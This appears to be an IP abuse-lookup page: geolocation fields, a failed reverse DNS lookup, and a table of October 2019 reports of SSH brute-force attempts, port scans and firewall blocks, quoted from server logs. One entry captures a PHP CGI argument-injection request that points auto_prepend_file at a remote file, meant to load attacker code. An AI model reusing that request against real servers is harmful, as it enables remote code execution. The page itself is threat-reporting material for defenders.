City: unknown
Region: unknown
Country: Japan
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 146.117.140.253
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 25606
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;146.117.140.253. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025031300 1800 900 604800 86400
;; Query time: 35 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Mar 13 20:25:19 CST 2025
;; MSG SIZE rcvd: 108
Host 253.140.117.146.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 253.140.117.146.in-addr.arpa: NXDOMAIN
IP | Type | Details | Datetime |
---|---|---|---|
136.34.218.11 | attack | 2019-10-17T12:34:25.790971homeassistant sshd[18524]: Invalid user deploy from 136.34.218.11 port 4532 2019-10-17T12:34:25.800099homeassistant sshd[18524]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=136.34.218.11 ... |
2019-10-17 20:48:53 |
144.217.217.179 | attackbotsspam | Oct 17 13:45:06 mail sshd[30099]: Invalid user backups from 144.217.217.179 Oct 17 13:45:06 mail sshd[30099]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=144.217.217.179 Oct 17 13:45:06 mail sshd[30099]: Invalid user backups from 144.217.217.179 Oct 17 13:45:08 mail sshd[30099]: Failed password for invalid user backups from 144.217.217.179 port 41701 ssh2 ... |
2019-10-17 21:03:35 |
211.167.75.228 | attackbots | Unauthorised access (Oct 17) SRC=211.167.75.228 LEN=40 TTL=239 ID=23238 TCP DPT=1433 WINDOW=1024 SYN |
2019-10-17 20:33:24 |
114.253.103.1 | attackbotsspam | MultiHost/MultiPort Probe, Scan, Hack - |
2019-10-17 20:28:44 |
80.211.129.34 | attackbots | 2019-10-17T11:41:13.481746hub.schaetter.us sshd\[31300\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.129.34 user=root 2019-10-17T11:41:15.326328hub.schaetter.us sshd\[31300\]: Failed password for root from 80.211.129.34 port 59094 ssh2 2019-10-17T11:45:35.585430hub.schaetter.us sshd\[31326\]: Invalid user sy from 80.211.129.34 port 43046 2019-10-17T11:45:35.594797hub.schaetter.us sshd\[31326\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.129.34 2019-10-17T11:45:37.740439hub.schaetter.us sshd\[31326\]: Failed password for invalid user sy from 80.211.129.34 port 43046 ssh2 ... |
2019-10-17 20:40:13 |
166.62.92.48 | attackbots | Wordpress brute-force |
2019-10-17 20:36:35 |
106.12.21.124 | attackspambots | Oct 17 14:51:35 localhost sshd\[30860\]: Invalid user wwwwww from 106.12.21.124 port 50418 Oct 17 14:51:35 localhost sshd\[30860\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.21.124 Oct 17 14:51:37 localhost sshd\[30860\]: Failed password for invalid user wwwwww from 106.12.21.124 port 50418 ssh2 |
2019-10-17 20:58:19 |
65.75.93.36 | attackspambots | Oct 17 01:41:59 auw2 sshd\[5503\]: Invalid user qweasd from 65.75.93.36 Oct 17 01:41:59 auw2 sshd\[5503\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.75.93.36 Oct 17 01:42:00 auw2 sshd\[5503\]: Failed password for invalid user qweasd from 65.75.93.36 port 37043 ssh2 Oct 17 01:45:43 auw2 sshd\[5802\]: Invalid user 122122 from 65.75.93.36 Oct 17 01:45:43 auw2 sshd\[5802\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.75.93.36 |
2019-10-17 20:36:04 |
159.203.201.64 | attackspam | 10/17/2019-13:45:12.679003 159.203.201.64 Protocol: 6 ET DROP Dshield Block Listed Source group 1 |
2019-10-17 21:00:08 |
157.92.24.222 | attack | Oct 17 01:35:56 friendsofhawaii sshd\[6190\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.92.24.222 user=root Oct 17 01:35:58 friendsofhawaii sshd\[6190\]: Failed password for root from 157.92.24.222 port 48078 ssh2 Oct 17 01:40:42 friendsofhawaii sshd\[6744\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.92.24.222 user=root Oct 17 01:40:44 friendsofhawaii sshd\[6744\]: Failed password for root from 157.92.24.222 port 56968 ssh2 Oct 17 01:45:33 friendsofhawaii sshd\[7122\]: Invalid user salomao from 157.92.24.222 |
2019-10-17 20:42:32 |
40.115.111.96 | attackbotsspam | PHP CGI Argument Injection: GET /index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=https://cld.pt/dl/download/ce43d293-be91-443d-a382-e153f8b00855/default2.txt HTTP/1.1 |
2019-10-17 20:31:32 |
92.119.160.80 | attack | Oct 17 13:56:12 mc1 kernel: \[2599739.907338\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:11:a9:7b:d2:74:7f:6e:37:e3:08:00 SRC=92.119.160.80 DST=159.69.205.51 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=345 PROTO=TCP SPT=50363 DPT=23385 WINDOW=1024 RES=0x00 SYN URGP=0 Oct 17 13:59:47 mc1 kernel: \[2599954.601096\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:11:a9:7b:d2:74:7f:6e:37:e3:08:00 SRC=92.119.160.80 DST=159.69.205.51 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=10475 PROTO=TCP SPT=50363 DPT=13391 WINDOW=1024 RES=0x00 SYN URGP=0 Oct 17 14:02:06 mc1 kernel: \[2600094.271590\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:11:a9:7b:d2:74:7f:6e:37:e3:08:00 SRC=92.119.160.80 DST=159.69.205.51 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=61420 PROTO=TCP SPT=50363 DPT=3392 WINDOW=1024 RES=0x00 SYN URGP=0 ... |
2019-10-17 20:50:34 |
119.29.114.235 | attackbotsspam | Invalid user silverline from 119.29.114.235 port 55154 |
2019-10-17 20:56:39 |
94.177.246.39 | attackbots | Oct 17 13:45:47 pornomens sshd\[15419\]: Invalid user lodwin from 94.177.246.39 port 60450 Oct 17 13:45:47 pornomens sshd\[15419\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.177.246.39 Oct 17 13:45:49 pornomens sshd\[15419\]: Failed password for invalid user lodwin from 94.177.246.39 port 60450 ssh2 ... |
2019-10-17 20:32:47 |
37.120.142.157 | attack | fell into ViewStateTrap:berlin |
2019-10-17 20:46:41 |